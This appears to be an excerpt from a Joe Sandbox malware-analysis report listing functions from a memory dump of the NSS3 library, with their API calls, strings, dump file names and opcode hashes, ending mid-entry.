API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: 49d2f18b70f699817e6d947f5b25c7e778556bd4e702a9b51e6e687ab585cda9
Instruction ID: 890d7161d508357b11ff940a41df4770b4bb0e6adabb98ba1f41bb09654b4fba
Opcode Fuzzy Hash: 49d2f18b70f699817e6d947f5b25c7e778556bd4e702a9b51e6e687ab585cda9
Instruction Fuzzy Hash: 17313BB1E052055FEB00DF25CC449AF7BB6EF8972CB198129E8159B741EB31EC05C7A9

Function 6C6A2920 Relevance: 10.6, APIs: 7, Instructions: 121timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C6A294E

Part of subcall function 6C701820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6C6A1D97,?,?), ref: 6C701836

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C6A296A
DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C6A2991

Part of subcall function 6C701820: PR_SetError.NSS3(FFFFE005,00000000,?,6C6A1D97,?,?), ref: 6C70184D

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C6A29AF
PR_Now.NSS3 ref: 6C6A2A29
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6A2A50
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6A2A79

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: TimeUtil$Choice_Decode$Error$GeneralizedTime_
String ID:
API String ID: 2509447271-0
Opcode ID: 824d7085cdd17861d1f3fe53429a8cb73da752441904f7992a86d396c0a08120
Instruction ID: f704dd428ab3d230749d2fdb9f4e529e1b9bed51d9a7f6c1e4ae6f947e828877
Opcode Fuzzy Hash: 824d7085cdd17861d1f3fe53429a8cb73da752441904f7992a86d396c0a08120
Instruction Fuzzy Hash: C641D271A083119FC314CE6AC944B4FB3E5ABC8718F058A2DF99C93740E730ED0A8B96

Function 6C6C8C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C6C8C7C

Part of subcall function 6C769DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C7B0A27), ref: 6C769DC6
Part of subcall function 6C769DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C7B0A27), ref: 6C769DD1
Part of subcall function 6C769DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C769DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6C8CB0
TlsGetValue.KERNEL32 ref: 6C6C8CD1
EnterCriticalSection.KERNEL32(?), ref: 6C6C8CE5
PR_Unlock.NSS3(?), ref: 6C6C8D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C6C8D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6C8D93

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: 50459156628c7b01f469e3f4bfbd234da675e7809de659271b3e0324eaf2a0e2
Instruction ID: 189ee5d392c213141544f39adc5ff9885b53c10fe167c06be7d00e05a73b7754
Opcode Fuzzy Hash: 50459156628c7b01f469e3f4bfbd234da675e7809de659271b3e0324eaf2a0e2
Instruction Fuzzy Hash: 9B312571B01205ABE7209F68DC487DAB7B4FF59318F14013AEA1967B60D770B964C7CA

Function 6C6C2E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C6BE728,?,00000038,?,?,00000000), ref: 6C6C2E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6C2E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6C2E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6C6C2E8F
PL_HashTableLookup.NSS3(?,?), ref: 6C6C2E9E
PR_Unlock.NSS3(?), ref: 6C6C2EAB
PR_Unlock.NSS3(?), ref: 6C6C2F0D

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: e44781b965450a6410a2720243741f418e0e460a8a4080ab9a25560ae5663676
Instruction ID: 62668a8b949a9e72b54d8aea3993a71531c19bffd768b822ac34d5bc8f8a1c1f
Opcode Fuzzy Hash: e44781b965450a6410a2720243741f418e0e460a8a4080ab9a25560ae5663676
Instruction Fuzzy Hash: 7131F879B001099BEB005F28DC848A6B779FF4A358B048175ED1897B11E731DC65C7D6

Function 6C7168A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(?), ref: 6C7168B4

Part of subcall function 6C769090: TlsGetValue.KERNEL32 ref: 6C7690AB
Part of subcall function 6C769090: TlsGetValue.KERNEL32 ref: 6C7690C9
Part of subcall function 6C769090: EnterCriticalSection.KERNEL32 ref: 6C7690E5
Part of subcall function 6C769090: TlsGetValue.KERNEL32 ref: 6C769116
Part of subcall function 6C769090: LeaveCriticalSection.KERNEL32 ref: 6C76913F

Part of subcall function 6C690F00: PR_GetPageSize.NSS3(6C690936,FFFFE8AE,?,6C6216B7,00000000,?,6C690936,00000000,?,6C62204A), ref: 6C690F1B
Part of subcall function 6C690F00: PR_NewLogModule.NSS3(clock,6C690936,FFFFE8AE,?,6C6216B7,00000000,?,6C690936,00000000,?,6C62204A), ref: 6C690F25

PR_MillisecondsToInterval.NSS3(?), ref: 6C7168E6
PR_MillisecondsToInterval.NSS3(?), ref: 6C716938
PR_MillisecondsToInterval.NSS3(?), ref: 6C716986
PR_ExitMonitor.NSS3(?), ref: 6C7169BA

Strings

n{l, xrefs: 6C7168D2, 6C716924, 6C716972

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: IntervalMillisecondsValue$CriticalEnterMonitorSection$ExitLeaveModulePageSize
String ID: n{l
API String ID: 1802314673-702554438
Opcode ID: 3417110f67d636e3c4739e2a3a1e0e1293592af35531d05f5249805ff7a69e4b
Instruction ID: 3052a79506447f9ed2b620b7f2886bce54b631675d37ea8df25cf93a5424e160
Opcode Fuzzy Hash: 3417110f67d636e3c4739e2a3a1e0e1293592af35531d05f5249805ff7a69e4b
Instruction Fuzzy Hash: 3D319172709A01ABDB245B70DA083D6BA70FF4630EF08023DD81A52E52D7357968CED3

Function 6C70CEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6C70CD93,?), ref: 6C70CEEE

Part of subcall function 6C7014C0: TlsGetValue.KERNEL32 ref: 6C7014E0
Part of subcall function 6C7014C0: EnterCriticalSection.KERNEL32 ref: 6C7014F5
Part of subcall function 6C7014C0: PR_Unlock.NSS3 ref: 6C70150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C70CD93,?), ref: 6C70CEFC

Part of subcall function 6C7010C0: TlsGetValue.KERNEL32(?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C7010F3
Part of subcall function 6C7010C0: EnterCriticalSection.KERNEL32(?,?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C70110C
Part of subcall function 6C7010C0: PL_ArenaAllocate.NSS3(?,?,?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C701141
Part of subcall function 6C7010C0: PR_Unlock.NSS3(?,?,?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C701182
Part of subcall function 6C7010C0: TlsGetValue.KERNEL32(?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C70119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C70CD93,?), ref: 6C70CF0B

Part of subcall function 6C700840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7008B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C70CD93,?), ref: 6C70CF1D

Part of subcall function 6C6FFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C6F8D2D,?,00000000,?), ref: 6C6FFB85
Part of subcall function 6C6FFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C6FFBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C70CD93,?), ref: 6C70CF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C70CD93,?), ref: 6C70CF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6C70CD93,?,?,?,?,?,?,?,?,?,?,?,6C70CD93,?), ref: 6C70CF78

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: 512c62d143dee07ec0d0addbd59e8c80b949745efbc281fd777e2b687288f762
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: 3611A5E6B002045BE700AB66AE45B6B76EC9F5554EF044039FC09D7741FB60E908C7B3

Function 6C6B8C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C6B8C1B
EnterCriticalSection.KERNEL32 ref: 6C6B8C34
PL_ArenaAllocate.NSS3 ref: 6C6B8C65
PR_Unlock.NSS3 ref: 6C6B8C9C
PR_Unlock.NSS3 ref: 6C6B8CB6

Part of subcall function 6C74DD70: TlsGetValue.KERNEL32 ref: 6C74DD8C
Part of subcall function 6C74DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C74DDB4

Strings

KRAM, xrefs: 6C6B8C8F

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: d9f0aaa089ff984d61c1aa329ef631945419a815522d24a714491fe0b49f1b68
Instruction ID: cee2b0dd24fd64c25eb6827502600af856cb430cc0a0ee28adde1b3fffd837ee
Opcode Fuzzy Hash: d9f0aaa089ff984d61c1aa329ef631945419a815522d24a714491fe0b49f1b68
Instruction Fuzzy Hash: 5B2171F56056028FD700AF78C488559BBF4FF09318F05896ED8889B711DB35E899CBDA

Function 6C6C8E80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6C6E2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C6B4F1C), ref: 6C6C8EA2

Part of subcall function 6C6EF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C6EF854
Part of subcall function 6C6EF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C6EF868
Part of subcall function 6C6EF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C6EF882
Part of subcall function 6C6EF820: free.MOZGLUE(04C483FF,?,?), ref: 6C6EF889
Part of subcall function 6C6EF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C6EF8A4
Part of subcall function 6C6EF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C6EF8AB
Part of subcall function 6C6EF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C6EF8C9
Part of subcall function 6C6EF820: free.MOZGLUE(280F10EC,?,?), ref: 6C6EF8D0

PK11_IsLoggedIn.NSS3(?,?,?,6C6E2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C6B4F1C), ref: 6C6C8EC3
TlsGetValue.KERNEL32(?,?,?,6C6E2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C6B4F1C), ref: 6C6C8EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6C6E2E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C6C8EF1
PR_Unlock.NSS3 ref: 6C6C8F20

Strings

b.nl, xrefs: 6C6C8E96, 6C6C8F25

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID: b.nl
API String ID: 1978757487-1036181540
Opcode ID: db59bed8c597540b1bf3b93b1b05f3a4de98353dd387cc3e9ed8b3887948148a
Instruction ID: 0c58002a7a9421ca9c76de011fd89218d3a5738373bb093f1a1831f537c3bb24
Opcode Fuzzy Hash: db59bed8c597540b1bf3b93b1b05f3a4de98353dd387cc3e9ed8b3887948148a
Instruction Fuzzy Hash: 15219C70A097059FC710AF28D5841A9BBF0FF8D358F01456EE8989BB50D730E854CBCA

Function 6C6F8970 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,6C6A61C4,?,6C6A5639,00000000), ref: 6C6F8991
TlsGetValue.KERNEL32(?,?,?,?,?,6C6A5639,00000000), ref: 6C6F89AD
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C6A5639,00000000), ref: 6C6F89C6
PR_WaitCondVar.NSS3 ref: 6C6F89F7
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C6A5639,00000000), ref: 6C6F8A0C

Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907AD
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907CD
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907D6
Part of subcall function 6C6907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C62204A), ref: 6C6907E4
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,6C62204A), ref: 6C690864
Part of subcall function 6C6907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C690880
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,6C62204A), ref: 6C6908CB
Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(?,?,6C62204A), ref: 6C6908D7
Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(?,?,6C62204A), ref: 6C6908FB

Strings

9Vjl, xrefs: 6C6F8986

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
String ID: 9Vjl
API String ID: 2759447159-524325995
Opcode ID: 40c89af8c08b68b06202574b897947c22acf849d3e6bd0a0a4e46145bdbe972f
Instruction ID: a7dd4659cf430bfa3b1b8acf544cab1907c43c46b3da7b9af8227891401a9e8f
Opcode Fuzzy Hash: 40c89af8c08b68b06202574b897947c22acf849d3e6bd0a0a4e46145bdbe972f
Instruction Fuzzy Hash: 68217FB4A047058FCB00AF7DC4841A9BBF5FF0A318F1146AADCA897611E730D896CB96

Function 6C7B2C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C7B2CA0
PR_ExitMonitor.NSS3 ref: 6C7B2CBE
calloc.MOZGLUE(00000001,00000014), ref: 6C7B2CD1
strdup.MOZGLUE(?), ref: 6C7B2CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C7B2D27

Strings

Loaded library %s (static lib), xrefs: 6C7B2D22

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 758339f362da3dc20d87fbaa763ada977e3cd3c56628e61e4b535cf2fa3882a9
Instruction ID: a4fb838fdc4caf2ff639c47d72e740ebef1582a0b5da0e68ca09e468e22f3b67
Opcode Fuzzy Hash: 758339f362da3dc20d87fbaa763ada977e3cd3c56628e61e4b535cf2fa3882a9
Instruction Fuzzy Hash: B911BFB17022049FEB208F15DE4DA6A77B4AB4A31DF14853DE81997B41E731EC08CBE1

Function 6C6A68E0 Relevance: 10.6, APIs: 7, Instructions: 56COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C6A68FB
EnterCriticalSection.KERNEL32 ref: 6C6A6913
PORT_FreeArena_Util.NSS3 ref: 6C6A693E
PR_Unlock.NSS3 ref: 6C6A6946
DeleteCriticalSection.KERNEL32 ref: 6C6A6951
free.MOZGLUE ref: 6C6A695D
PR_Unlock.NSS3 ref: 6C6A6968

Part of subcall function 6C74DD70: TlsGetValue.KERNEL32 ref: 6C74DD8C
Part of subcall function 6C74DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C74DDB4

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: CriticalSection$UnlockValue$Arena_DeleteEnterFreeLeaveUtilfree
String ID:
API String ID: 1628394932-0
Opcode ID: e1d20cb91dd9f97c34d3e675bd49ab9086b14091900ade65a0a6f8fa1c929855
Instruction ID: 26052d830ab69226b4f4e03b683e3c7fb64e352a54d6f01afe842e11dfaae91b
Opcode Fuzzy Hash: e1d20cb91dd9f97c34d3e675bd49ab9086b14091900ade65a0a6f8fa1c929855
Instruction Fuzzy Hash: FB114CB56046058FEB00AFB8D4C856DBBF4FF06359F014569D898DB601EB30D889CB96

Function 6C700FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6A87ED,00000800,6C69EF74,00000000), ref: 6C701000
PR_NewLock.NSS3(?,00000800,6C69EF74,00000000), ref: 6C701016

Part of subcall function 6C7698D0: calloc.MOZGLUE(00000001,00000084,6C690936,00000001,?,6C69102C), ref: 6C7698E5

PL_InitArenaPool.NSS3(00000000,security,6C6A87ED,00000008,?,00000800,6C69EF74,00000000), ref: 6C70102B
TlsGetValue.KERNEL32(00000000,?,?,6C6A87ED,00000800,6C69EF74,00000000), ref: 6C701044
free.MOZGLUE(00000000,?,00000800,6C69EF74,00000000), ref: 6C701064

Strings

security, xrefs: 6C701025

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: calloc$ArenaInitLockPoolValuefree
String ID: security
API String ID: 3379159031-3315324353
Opcode ID: 11035a1f761aea30f67c01f465b2a2eedc34c402b3d8cc5e582f589c96b0da8c
Instruction ID: 0995bb1723872ed727bceafa80adaaae36d4f60e0f34eb6228f81e0ed329fe4c
Opcode Fuzzy Hash: 11035a1f761aea30f67c01f465b2a2eedc34c402b3d8cc5e582f589c96b0da8c
Instruction Fuzzy Hash: 5D0144B1B002509BE7202F2D9E08A563AE8BF0679DF010139E89896E51EB60D154EBD2

Function 6C6FA970 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84a16a554d53895143116da336a9b4aeebbd5da2b23d8940b4f11566e3140be8
Instruction ID: 0326364aa4af289978fd3eb3f9d914032b9dcd1ba4ffaf11bc69b01436009587
Opcode Fuzzy Hash: 84a16a554d53895143116da336a9b4aeebbd5da2b23d8940b4f11566e3140be8
Instruction Fuzzy Hash: 01911B30D041684FDB258E1888913DAB7F7AF4A31CF1581E9C5B99BA03D6318E87CB99

Function 6C742E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6C743046

Part of subcall function 6C72EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C72EE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C717FFB), ref: 6C74312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C743154
